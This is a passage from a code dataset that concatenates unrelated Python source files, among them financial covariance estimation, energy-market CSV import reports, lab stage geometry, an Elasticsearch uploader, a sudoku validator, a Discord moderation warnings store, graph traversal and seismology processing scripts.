Average\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport logging\n\nfrom max.covar.covar import Covar\nimport max.covar.util as util\n\nlogger = logging.getLogger(__name__)\n\n\nclass EMA(Covar):\n\n def __init__(self, df, window):\n logger.info('Initializing EMA class')\n super(EMA, self).__init__(df, window)\n self.name = 'EMA'\n self.parameter = {'alpha_cor': np.nan, 'alpha_vol': np.nan}\n self.parameter_candidate = {'alpha_cor': np.array([]), 'alpha_vol': np.array([])}\n self.result = {'value': np.nan}\n self.result_candidate = pd.DataFrame()\n self.estimate = {'cor': np.array([]), 'vol': np.array([]), 'cov': np.array([])}\n\n def cal_estimate(self, parameter):\n self._check_parameter(parameter)\n alpha_cor = parameter['alpha_cor']\n alpha_vol = parameter['alpha_vol']\n logger.debug('Computing EMA covariance, alpha_cor = %.3f, alpha_vol = %.3f', alpha_cor, alpha_vol)\n cor_ema = self.ex_post['cor'].copy()\n vol_ema = self.ex_post['vol'].copy()\n n_dates, n_stocks = self.n_dates, self.n_stocks\n cov_ema = np.repeat(np.nan, n_dates*n_stocks*n_stocks).reshape(n_dates, n_stocks, n_stocks)\n cov_ema[self.window - 1, :, :] = util.nan_cov(cor_ema[self.window - 1, :, :], vol_ema[self.window - 1, :])\n for i in range(self.window, n_dates):\n cor_ema[i, :, :] = util.nan_ema(cor_ema[i-1, :, :], self.ex_post['cor'][i, :, :], alpha_cor)\n vol_ema[i, :] = util.nan_ema(vol_ema[i-1, :], self.ex_post['vol'][i, :], alpha_vol)\n cov_ema[i, :, :] = util.nan_cov(cor_ema[i, :, :], vol_ema[i, :])\n return {'cor': cor_ema, 'vol': vol_ema, 'cov': cov_ema}\n","repo_name":"wazai/max","sub_path":"max/covar/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22034773030","text":"from datetime import datetime as Datetime\nimport csv\nimport os\nimport io\nfrom flask import render_template, request\nfrom chellow.models import (\n VoltageLevel, Participant, Party, MarketRole, Llfc, Mtc, MeterType)\nfrom chellow.utils import hh_format, send_response\nimport pytz\nfrom werkzeug.exceptions import BadRequest\nfrom sqlalchemy.orm import joinedload\n\n\ndef to_iso(dmy):\n if len(dmy) == 0:\n return ''\n else:\n return '-'.join([dmy[6:], dmy[3:5], dmy[:2]]) + ' 00:00'\n\n\ndef is_common_mtc(code):\n return 499 < code < 510 or 799 < code < 1000\n\n\ndef do_get(sess):\n return render_template('report_163.html')\n\n\ndef content(table, version, f, sess):\n reader = iter(csv.reader(f))\n 
next(reader)\n if table == 'Line_Loss_Factor_Class':\n LLFC_MAP = dict(\n ((llfc.dno.participant.code, llfc.code), llfc) for\n llfc in sess.query(Llfc).join(Party).options(\n joinedload(Llfc.dno).joinedload('participant')))\n VOLTAGE_LEVEL_CODES = set(\n [v.code for v in sess.query(VoltageLevel)])\n DNO_MAP = dict(\n (dno.participant.code, dno) for dno in sess.query(Party).\n join(MarketRole).filter(MarketRole.code == 'R').options(\n joinedload(Party.participant)))\n for i, values in enumerate(reader):\n participant_code = values[0]\n # market_role_code = values[1]\n from_date_mpr = values[2]\n llfc_code_raw = values[3]\n # from_date_settlement = values[4]\n llfc_description = values[5]\n class_indicator = values[6]\n to_date_settlement = values[7]\n\n llfc_code = llfc_code_raw.zfill(3)\n llfc = LLFC_MAP.get((participant_code, llfc_code))\n\n if llfc is None:\n try:\n dno = DNO_MAP[participant_code]\n except KeyError:\n yield ''.join(\n \"# There is no DNO with participant code \",\n participant_code, \".\\n\")\n continue\n\n voltage_level_code = 'LV'\n llfc_description_upper = llfc_description.upper()\n for vl_code in VOLTAGE_LEVEL_CODES:\n if vl_code in llfc_description_upper:\n voltage_level_code = vl_code\n break\n\n is_substation = any(\n p in llfc_description for p in [\n '_SS', ' SS', ' S/S', '(S/S)', 'sub', 'Sub'])\n\n is_import = not any(\n p in class_indicator for p in ['C', 'D'])\n\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'llfc', dno.dno_code, llfc_code,\n llfc_description, voltage_level_code,\n is_substation, is_import,\n to_iso(from_date_mpr),\n to_iso(to_date_settlement)))) + \"\\n\"\n elif table == 'Market_Participant':\n for i, values in enumerate(reader):\n participant_code = values[0]\n participant_name = values[1]\n\n participant = sess.query(Participant).filter(\n Participant.code == participant_code).first()\n\n if participant is None:\n\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'participant', participant_code,\n participant_name))) + \"\\n\"\n elif participant_name != participant.name:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'participant', participant_code,\n participant_name))) + \"\\n\"\n elif table == 'Market_Role':\n for i, values in enumerate(reader):\n role_code = values[0]\n role_description = values[1]\n\n role = sess.query(MarketRole).filter(\n MarketRole.code == role_code).first()\n\n if role is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'market_role', role_code,\n role_description))) + \"\\n\"\n elif role_description != role.description:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'market_role', role_code,\n role_description))) + \"\\n\"\n elif table == 'Market_Participant_Role':\n for i, values in enumerate(reader):\n participant_code = values[0]\n market_role_code = values[1]\n party = sess.query(Party).join(Participant). 
\\\n join(MarketRole).filter(\n Participant.code == participant_code,\n MarketRole.code == market_role_code).first()\n valid_from_str = values[2]\n valid_from = Datetime.strptime(valid_from_str, \"%d/%m/%Y\")\n valid_to_str = values[3]\n if valid_to_str == '':\n valid_to = None\n else:\n valid_to = Datetime.strptime(valid_to_str, \"%d/%m/%Y\")\n name = values[4]\n dno_code_str = values[14]\n if len(dno_code_str) == 0:\n dno_code = None\n else:\n dno_code = dno_code_str\n\n if party is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'party', market_role_code,\n participant_code, name,\n hh_format(valid_from),\n '' if valid_to is None else\n hh_format(valid_to), dno_code_str))) + \"\\n\"\n elif name != party.name or dno_code != party.dno_code:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'party', market_role_code,\n participant_code, name,\n hh_format(valid_from),\n '' if valid_to is None else\n hh_format(valid_to), dno_code_str))) + \"\\n\"\n elif table == 'Meter_Timeswitch_Class':\n for i, values in enumerate(reader):\n code_str = values[0]\n code_int = int(code_str)\n if is_common_mtc(code_int):\n code = code_str.zfill(3)\n valid_from_str = values[1]\n valid_from = Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[2]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n description = values[3]\n # common_code_indicator = values[4]\n has_related_metering_str = values[5]\n has_related_metering = has_related_metering_str == 'T'\n meter_type_code = values[6]\n meter_payment_type_code = values[7]\n has_comms_str = values[8]\n has_comms = has_comms_str == 'T'\n is_hh_str = values[9]\n is_hh = is_hh_str == 'H'\n tpr_count_str = values[10]\n if tpr_count_str == '':\n tpr_count = 0\n else:\n tpr_count = int(tpr_count_str)\n\n mtc = Mtc.find_by_code(sess, None, code)\n if mtc is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'mtc', '', code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif (\n description, has_related_metering, has_comms,\n is_hh, meter_type_code,\n meter_payment_type_code, tpr_count, valid_from,\n valid_to) != (\n mtc.description, mtc.has_related_metering,\n mtc.has_comms, mtc.is_hh, mtc.meter_type.code,\n mtc.meter_payment_type.code, mtc.tpr_count,\n mtc.valid_from, mtc.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'mtc', '', code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif table == 'MTC_in_PES_Area':\n dnos = dict(\n (p.participant.code, (p.id, p.dno_code)) for p in sess.query(\n Party).join(Participant).join(MarketRole).filter(\n MarketRole.code == 'R').options(\n joinedload(Party.participant)))\n mtcs = dict(\n ((m.dno_id, m.code), m) for m in sess.query(Mtc).options(\n joinedload(Mtc.meter_type),\n joinedload(Mtc.meter_payment_type)).all())\n for i, values in enumerate(reader):\n code_str = values[0]\n code_int = int(code_str)\n if not is_common_mtc(code_int):\n code = code_str.zfill(3)\n participant_code = values[2]\n dno_id, dno_code = dnos[participant_code]\n valid_from_str = values[3]\n valid_from = 
Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[4]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n description = values[5]\n meter_type_code = values[6]\n meter_payment_type_code = values[7]\n has_related_metering = code_int > 500\n has_comms = values[8] == 'Y'\n is_hh = values[9] == 'H'\n tpr_count_str = values[10]\n if tpr_count_str == '':\n tpr_count = 0\n else:\n tpr_count = int(tpr_count_str)\n\n mtc_dno_id = dno_id if Mtc.has_dno(code) else None\n mtc = mtcs.get((mtc_dno_id, code))\n\n if mtc is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'mtc', dno_code, code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif (\n description, has_related_metering, has_comms,\n is_hh, meter_type_code, meter_payment_type_code,\n tpr_count, valid_from, valid_to) != (\n mtc.description, mtc.has_related_metering,\n mtc.has_comms, mtc.is_hh, mtc.meter_type.code,\n mtc.meter_payment_type.code, mtc.tpr_count,\n mtc.valid_from, mtc.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'mtc', dno_code, code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif table == 'MTC_Meter_Type':\n for i, values in enumerate(reader):\n code = values[0]\n description = values[1]\n valid_from_str = values[2]\n valid_from = Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[3]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n pt = sess.query(MeterType).filter(\n MeterType.code == code).first()\n if pt is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'meter_type', code, description,\n valid_from_out, valid_to_out))) + \"\\n\"\n\n elif (description, valid_from, valid_to) != (\n pt.description, pt.valid_from, pt.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'meter_type', code, description,\n valid_from_out, valid_to_out))) + \"\\n\"\n else:\n raise Exception(\"The table \" + table + \" is not recognized.\")\n\n\ndef do_post(sess):\n file_item = request.files[\"file\"]\n file_path = file_item.filename\n file_head, file_name = os.path.split(file_path)\n file_title, file_ext = os.path.splitext(file_name)\n if not file_ext == '.csv':\n raise BadRequest(\n \"The file name should have the extension .csv, but in fact it \"\n \"has the extension '\" + file_ext + \"'.\")\n idx = file_title.rfind('_')\n table = file_title[:idx]\n version = file_title[idx+1:]\n f = io.StringIO(str(file_item.read(), 'utf8'))\n f.seek(0)\n return send_response(\n content, args=(table, version, f, sess),\n file_name=table + '_' + version + '_general_import.csv')\n","repo_name":"JuviAndaya/chellow","sub_path":"chellow/reports/report_163.py","file_name":"report_163.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"9478415318","text":"# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Tue Sep 24 11:37:53 2019\n\n@author: pearp\n\"\"\"\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## user inputs\ntheta_x_deg = 1\ntheta_y_deg = 1\ntheta_z_deg = 0\n##\n\ndef c(theta):\n    return np.cos(theta)\n\ndef s(theta):\n    return np.sin(theta)\n\ndef rotation_x(theta):\n    R = np.array([[1, 0, 0], [0, c(theta), -s(theta)], [0, s(theta), c(theta)]])\n    return R\n\ndef rotation_y(theta):\n    R = np.array([[c(theta), 0, s(theta)], [0, 1, 0], [-s(theta), 0, c(theta)]])\n    return R\n\ndef rotation_z(theta):\n    R = np.array([[c(theta), -s(theta), 0], [s(theta), c(theta), 0], [0, 0, 1]])\n    return R\n\n## Start of code\n\nA = np.array([15, 5, 130]) # offset from stage rotation centre to desired rotation centre\nprint(\"Rotation centre offset is:\")\nprint(\"x = \" + str(A[0]) + \"mm\")\nprint(\"y = \" + str(A[1]) + \"mm\")\nprint(\"z = \" + str(A[2]) + \"mm\")\n\nprint(\"For an rotation angle of \")\nprint(str(theta_x_deg) + \" degree about the x-axis,\")\nprint(str(theta_y_deg) + \" degree about the y-axis, and\")\nprint(str(theta_z_deg) + \" degree about the z-axis:\")\n\n# Calculate elements of rotation matrices\nR_x = rotation_x(np.deg2rad(theta_x_deg))\n\nR_y = rotation_y(np.deg2rad(theta_y_deg))\n\nR_z = rotation_z(np.deg2rad(theta_z_deg))\n\nR = np.matmul(R_y, R_z)\nR = np.matmul(R_x, R)\n\n# Apply rotation matrix R to point A\nB = np.matmul(R, A) # location of desired rotation centre after stage rotation\n\nT_ab = B - A \nT_ba = -T_ab # desired post-rotation translation to move rotation centre back to axis\n\nprint(\"Requires stage translation of:\")\nprint(\"x = {0:.3f}mm\".format(T_ba[0]))\nprint(\"y = {0:.3f}mm\".format(T_ba[1]))\nprint(\"z = {0:.3f}mm\".format(T_ba[2]))","repo_name":"philearp/ufr-development-repo","sub_path":"stage-movement/StageRotationCorrectionDevelop.py","file_name":"StageRotationCorrectionDevelop.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"74541151836","text":"\"\"\"\nAuthor: Charles Liu\n\nProgram: Intro to Cloud Computing Assignment 3; Bulk Uploading to ElasticSearch python code\n\nDate: 6/29/2022\n\n\"\"\"\nfrom variables import *\nimport pandas as pd\nfrom requests_aws4auth import AWS4Auth\nimport boto3\nimport requests\nimport openpyxl\nimport csv\nimport string\n\n\nf = open('ES.csv')\n\ndata = csv.reader(f)\n\nidx = 0\n\nchar_to_remove = '[]\"'\n\nhost = ES_URL\npath = 'posts/_doc/'\nregion = 'us-east-1'\nservice = 'es'\n#credentials = boto3.Session().get_credentials()\n#awsauth = AWS4Auth(region, service, session_token=credentials.token)\n\n\ndef clean_string(str):\n    new_str = \"\"\n    if str != '[\"\"]':\n        for char in str:\n            if (not char in char_to_remove):\n                new_str += char\n    else:\n        new_str = str\n    return new_str\n\n\nnext(data)\n\nfor i in data:\n    id = int(i[0])\n    tags = []\n    for index in range(1,len(i)):\n        add_str = clean_string(i[index])\n        tags.append(add_str)\n    print (\"#:\", idx, \" id:\", id, \" tags:\", tags, \"\\n\")\n    payload = {\"id\": id, \"tags\": tags}\n    url = host+path+str(idx+1)+'/'\n    r = requests.post(url, auth=(USER, PASS), json = payload)\n    print(r.text, \"\\n\")\n    idx += 1\n    if idx == 1200:\n        break\n\n\n\nf.close()\n\n\n\n\n\n\n\n\n","repo_name":"Chliu81/Intro-to-Cloud-Computing","sub_path":"assignments/assignment-3/ES/BulkUploadES.py","file_name":"BulkUploadES.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"15995841467","text":"class Solution:\n    def validRow(self, start, grid):\n        seen = set()\n        for k in range(9):\n            number = grid[start + k]\n            if number != \".\":\n                if number in seen:\n                    return False\n                seen.add(number)\n        return True\n\n    def validColumn(self, start, grid):\n        seen = set()\n        for k in range(9):\n            number = grid[start + 9 * k]\n            if number != \".\":\n                if number in seen:\n                    return False\n                seen.add(number)\n        return True\n\n    def validSquare(self, start, grid):\n        seen = set()\n        list_number = []\n        for k in range(3):\n            list_number.append(grid[start + k])\n            list_number.append(grid[start + 9 + k])\n            list_number.append(grid[start + 18 + k])\n        for number in list_number:\n            if number != \".\":\n                if number in seen:\n                    return False\n                seen.add(number)\n        return True\n\n    def isValidSudoku(self, board: List[List[str]]) -> bool:\n        grid = []\n        for l in board:\n            grid += l\n        for k in range(9):\n            if not self.validColumn(k, grid) or not self.validRow(k * 9, grid):\n                return False\n        for i in range(3):\n            for j in range(3):\n                if not self.validSquare(i * 3 + j * 27, grid):\n                    return False\n        return True\n","repo_name":"INSAlgo/trainings-2019","sub_path":"MC_2019_11 /15_Valid_Sudoku.py","file_name":"15_Valid_Sudoku.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"}
{"seq_id":"9308945324","text":"from datetime import datetime, timedelta\nfrom bson.objectid import ObjectId, InvalidId\nfrom pymongo import DESCENDING\n\n\nclass WarningsManager:\n    def __init__(self, db):\n        self.collection = db['warnings_v2']\n\n    def add_warning(self, warning):\n        warning_data = warning.to_dict()\n        result = self.collection.insert_one(warning_data)\n        warning._id = result.inserted_id  # Update _id of the Warning object\n\n    def get_warnings(self, user_id, server_id):\n        query = {\"user_id\": str(user_id), \"server_id\": str(server_id)}\n        results = self.collection.find(query).sort(\"created_at\", DESCENDING)\n        return [Warning.from_dict(data) for data in results]\n\n    def try_delete_warning(self, warning_id, server_id):\n        try:\n            warning_id = ObjectId(warning_id)\n        except (InvalidId, TypeError):\n            return f\"Invalid warning id: `{warning_id}`\"\n\n        found_warning = self.collection.find_one({\"_id\": warning_id, \"server_id\": str(server_id)})\n\n        if found_warning is None:\n            return f\"Warning with id `{warning_id}` not found.\"\n        else:\n            self.collection.delete_one({\"_id\": warning_id})\n            return f\"Deleted warning with id `{warning_id}` for user {found_warning.user_name}\"\n\n    def try_get_warning(self, warning_id, server_id):\n        try:\n            warning_id = ObjectId(warning_id)\n        except (InvalidId, TypeError):\n            return None\n\n        return self.collection.find_one({\"_id\": warning_id, \"server_id\": str(server_id)})\n\n    def delete_warning(self, warning):\n        self.collection.delete_one({\"_id\": warning._id})\n\n    def get_ttl(self):  # ttl = time to live\n        \"\"\"\n        Retrieves the Time To Live (ttl) value in SECONDS.\n        \"\"\"\n        default = timedelta(days=90)  # the default expiration time, DO NOT change it\n\n        indexes = self.collection.list_indexes()\n        for index in indexes:\n            if 'expireAfterSeconds' in index:\n                return index['expireAfterSeconds']\n        return 
default\n\n\nclass Warning:\n def __init__(self, user_id, user_name, level, reason, mod_id, mod_name, server_id, server_name, created_at: datetime):\n self._id = None # Initialize _id as None by default\n self.user_id = str(user_id)\n self.user_name = str(user_name)\n self.level = int(level)\n self.reason = str(reason)\n self.mod_id = str(mod_id)\n self.mod_name = str(mod_name)\n self.server_id = str(server_id)\n self.server_name = str(server_name)\n self.created_at: datetime = created_at\n\n def to_dict(self):\n data = {\n \"user_id\": self.user_id,\n \"user_name\": self.user_name,\n \"level\": self.level,\n \"reason\": self.reason,\n \"mod_id\": self.mod_id,\n \"mod_name\": self.mod_name,\n \"server_id\": self.server_id,\n \"server_name\": self.server_name,\n \"created_at\": self.created_at\n }\n if self._id:\n data[\"_id\"] = self._id\n return data\n\n @classmethod\n def from_dict(cls, data):\n warning = cls(\n data[\"user_id\"],\n data[\"user_name\"],\n data[\"level\"],\n data[\"reason\"],\n data[\"mod_id\"],\n data[\"mod_name\"],\n data[\"server_id\"],\n data[\"server_name\"],\n data[\"created_at\"]\n )\n warning._id = data.get(\"_id\") # Set _id if present in the data\n return warning\n\nclass WarnLevel:\n def __init__(self, emoji, color, name):\n self.emoji = emoji\n self.color = color\n self.name = name\n\nwarn_levels = {\n 0: WarnLevel(\"🔵\", 0x55ACEE, \"Verbal\"),\n 1: WarnLevel(\"🟢\", 0x78B159, \"Normal\"),\n 3: WarnLevel(\"🟡\", 0xFDCB58, \"Medium\"),\n 5: WarnLevel(\"🟠\", 0xF4900C, \"Big\"),\n 7: WarnLevel(\"🔴\", 0xDD2E44, \"Huge\"),\n 10: WarnLevel(\"âš«\", 0x000000, \"nil\")\n}","repo_name":"s00240122/Python-tings","sub_path":"Maiq bot/db/warnings_manager.py","file_name":"warnings_manager.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74541437916","text":"from collections import deque\n\n# n : 정점의 개수, m : 간선의 개수, v : 탐색을 시작할 정점의 번호\nn, m, v = map(int, input().split())\ngraph = [[] for _ in range(n + 1)] # 0 ~ n까지의 2차원 리스트(빈 리스트) 생성, index 0은 사용 X\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a) # 단방향이 아니므로 양쪽 인덱스에 모두 대입\n\nfor i in range(n + 1):\n graph[i].sort() # 정점 번호가 작은 것을 먼저 방문하기 위한 오름차순 정렬\n\nvisited_dfs = [False] * (n + 1)\nvisited_bfs = [False] * (n + 1)\n\ndef dfs(graph, v, visited_dfs):\n visited_dfs[v] = True # 현재 노드를 방문처리\n print(v, end=' ')\n\n # 현재 노드와 연결된 다른 노드를 재귀적으로 방문\n for i in graph[v]:\n if not visited_dfs[i]:\n dfs(graph, i, visited_dfs)\n\ndef bfs(graph, v, visited_bfs):\n q = deque([v])\n visited_bfs[v] = True # 현재 노드를 방문처리\n \n while q: # queue가 빌 때까지 수행\n # queue에서 하나의 원소를 뽑아 출력\n x = q.popleft()\n print(x, end=' ')\n \n # 아직 방문하지 않은 인접한 원소들을 큐에 삽입\n for i in graph[x]:\n if not visited_bfs[i]:\n q.append(i)\n visited_bfs[i] = True\n\ndfs(graph, v, visited_dfs)\nprint() # 줄바꿈\nbfs(graph, v, visited_bfs)\n","repo_name":"chlgksdbs/Baekjoon-Online-Judge","sub_path":"Python/단계별로 풀어보기/27. 
그래프와 순회/[1260] DFS와 BFS.py","file_name":"[1260] DFS와 BFS.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9737115231","text":"import argparse\nimport sys\nfrom pathlib import Path\nimport os\nSPIKECOUNTER_PATH = os.getenv(\"SPIKECOUNTER_PATH\")\nsys.path.append(SPIKECOUNTER_PATH)\n\nimport argparse\nfrom spikecounter.analysis import images\nfrom spikecounter import utils\nimport logging\nimport skimage.io as skio\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"expt_info_path\")\nparser.add_argument(\"data_folder\")\nparser.add_argument(\"roi_path\")\nparser.add_argument(\"--expt_index\", default=\"None\", type=str)\nparser.add_argument(\"--block_size\", default=375, type=int)\nparser.add_argument(\"--offset\", default=0.05, type=float)\nparser.add_argument(\"--output_data_dir\", default=\"None\", type=str)\n\n\n\nargs = parser.parse_args()\n\noutput_data_dir = args.output_data_dir\n\nif output_data_dir == \"None\":\n output_data_dir = args.data_folder\n \noutput_root = os.path.join(output_data_dir, \"analysis\", \"individual_fish_recordings\")\nos.makedirs(output_root, exist_ok=True)\nlogging.basicConfig(filename=os.path.join(output_root, \"debug.log\"), level=logging.DEBUG, encoding=\"utf-8\", filemode=\"w\")\n\nexpt_info = pd.read_csv(args.expt_info_path).sort_values(\"start_time\")\nroi_mask = skio.imread(args.roi_path)\n\n\nif args.expt_index == \"None\":\n expt_info[\"placeholder_index\"] = \"\"\n expt_info = expt_info.reset_index().set_index(\"placeholder_index\")\n\n\nfor idx in expt_info.index.unique():\n idx_string = \"_\".join([str(f) for f in utils.make_iterable(idx)])\n output_path = os.path.join(output_root, idx_string)\n os.makedirs(output_path, exist_ok=True)\n curr_batch_info = expt_info.loc[idx]\n segmentation_mask = []\n # for i in range(2):\n for i in range(curr_batch_info.shape[0]):\n file_name = curr_batch_info[\"file_name\"].iloc[i]\n print(file_name)\n img = skio.imread(os.path.join(args.data_folder, \"%s.tif\" % file_name))\n ri = images.extract_bbox_images(img, roi_mask)\n \n for j in range(len(ri)):\n embryo = j+1\n embryo_directory = os.path.join(output_root, idx_string, \"E%d\" % embryo)\n os.makedirs(embryo_directory, exist_ok=True)\n skio.imsave(os.path.join(embryo_directory, \"E%d_%s.tif\" % (embryo, file_name)), ri[j])","repo_name":"adamcohenlab/Jia2023FirstHeartbeat","sub_path":"scripts/split_embryos_manual_ROI.py","file_name":"split_embryos_manual_ROI.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"43329493605","text":"#!/usr/bin/env python3\n# reads in \"*sel.mseed\" for a pair of events\n# align traces by shifting, and record time shifts for station statics\n# plots traces before and after time shift\n# saves aligned traces (not generally used) and static corrections, used in pro3 codes\n# John Vidale, 2/2019\ndef pro4statics(eq_file, ref_trace = 'N.SZW',\n\t\t\t\tdphase = 'PKIKP', dphase2 = 'PKiKP', dphase3 = 'PKIKP', dphase4 = 'PKiKP',\n\t\t\t\tstart_corr_win = -1, end_corr_win = 3, plot_scale_fac = 0.05,\n\t\t\t\tqual_threshold = 0, corr_threshold = 0,\n\t\t\t\tmax_time_shift = 2, min_dist = 150, max_dist = 164, ARRAY = 0):\n\n\tfrom obspy import UTCDateTime\n\tfrom obspy.signal.cross_correlation import xcorr_pick_correction\n\tfrom obspy import Stream\n\tfrom obspy import Trace\n\tfrom obspy import 
read\n\tfrom obspy.geodetics import gps2dist_azimuth\n\timport numpy as np\n\timport os\n\tfrom obspy.taup import TauPyModel\n\timport matplotlib.pyplot as plt\n\tmodel = TauPyModel(model='iasp91')\n\n\timport sys # don't show any warnings\n\timport warnings\n\n\tif not sys.warnoptions:\n\t warnings.simplefilter(\"ignore\")\n\t#%% Get station location file\n\tif ARRAY == 0: # Hinet set\n\t\tsta_file = '/Users/vidale/Documents/GitHub/Array_codes/Files/hinet_sta.txt'\n\telif ARRAY == 1: # LASA set\n\t\tsta_file = '/Users/vidale/Documents/GitHub/Array_codes/Files/LASA_sta.txt'\n\twith open(sta_file, 'r') as file:\n\t\tlines = file.readlines()\n\tprint('Station file has ' + str(len(lines)) + ' lines.')\n\t# Load station coords into arrays\n\t\t# old line: station_index = range(343)\n\tstation_index = range(len(lines))\n\tst_lats = []\n\tst_lons = []\n\tst_deps = []\n\tst_names = []\n\tfor ii in station_index:\n\t\tline = lines[ii]\n\t\tsplit_line = line.split()\n\t\tst_names.append(split_line[0])\n\t\tst_lats.append( split_line[1])\n\t\tst_lons.append( split_line[2])\n\t\tst_deps.append( split_line[3])\n\n\t# initialize lists of statics\n\tsta_names = []\n\tsta_dists = []\n\tsta_lats = []\n\tsta_lons = []\n\tsta_statics = []\n\tsta_corrs = []\n\n\t#%%\n\t#dphase = 'PKIKP' # phase to be aligned\n\t#dphase2 = 'PKiKP' # another phase to have traveltime plotted\n\t#dphase3 = 'PKP' # another phase to have traveltime plotted\n\t#dphase4 = 'pP' # another phase to have traveltime plotted\n\t#ref_trace = 'N.SZW' # trace with reference waveform\n\t#start_corr_win = 2 # plots start Xs before PKiKP\n\t#end_corr_win = 7 # plots end Xs before PKiKP\n\t#max_time_shift = 2 # searches up to this time shift for alignment\n\tstart_plot_win = 0 # plots start Xs before PKiKP\n\tend_plot_win = 20 # plots end Xs before PKiKP\n\t#corr_threshold = 0. # threshold that correlation is good enough to keep trace\n\t#max_dist = 151\n\t#min_dist = 150.6\n#\tmax_dist = 164\n#\tmin_dist = 150\n\t#plot_scale_fac = 0.2 # Bigger numbers make each trace amplitude bigger on plot\n\t#qual_threshold = 0 # minimum SNR\n\tplot_tt = 1 # plot the traveltimes?\n\tplot_flag = False # plot for each trace? 
Watch out, can be lots, one for each station pair!!\n\n\t#%% Get saved event info, also used to name files\n\t# event 2016-05-28T09:47:00.000 -56.241 -26.935 78\n\tfile = open(eq_file, 'r')\n\tlines=file.readlines()\n\tsplit_line = lines[0].split()\n#\t\t\tids.append(split_line[0]) ignore label, now \"event\"\n\tt = UTCDateTime(split_line[1])\n\tdate_label = split_line[1][0:10]\n\tev_lat = float( split_line[2])\n\tev_lon = float( split_line[3])\n\tev_depth = float( split_line[4])\n\n\tprint('Date label ' + date_label + ' lat ' + str(ev_lat) + ' lon ' + str(ev_lon))\n\n\tst = Stream()\n#\tfname = 'HD' + date_label + '.mseed'\n\tfname = 'HD' + date_label + 'sel.mseed' # sel file has windowing, shift?, filtering\n\n\tprint('fname ' + fname)\n\n\tos.chdir('/Users/vidale/Documents/PyCode/LASA/Pro_Files/')\n\tos.system('pwd')\n\tst=read(fname)\n\tprint('Read in: ' + str(len(st)) + ' traces')\n\tprint('First trace has : ' + str(len(st[0].data)) + ' time pts ')\n\n\t#%% reference trace, and its starttime, distance, arrival time\n\ttr_ref = Trace()\n\tfor tr in st: # loop over seismograms to find reference trace\n\t\tif (tr.stats.station == ref_trace): # found it\n\t\t\ttr_ref = tr.copy()\n\t\t\tfor ii in station_index: # find station in inventory\n\t\t\t\tthis_name = st_names[ii] # disabled convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = this_name[0:5]\n\t\t\t\tname_truc_cap = 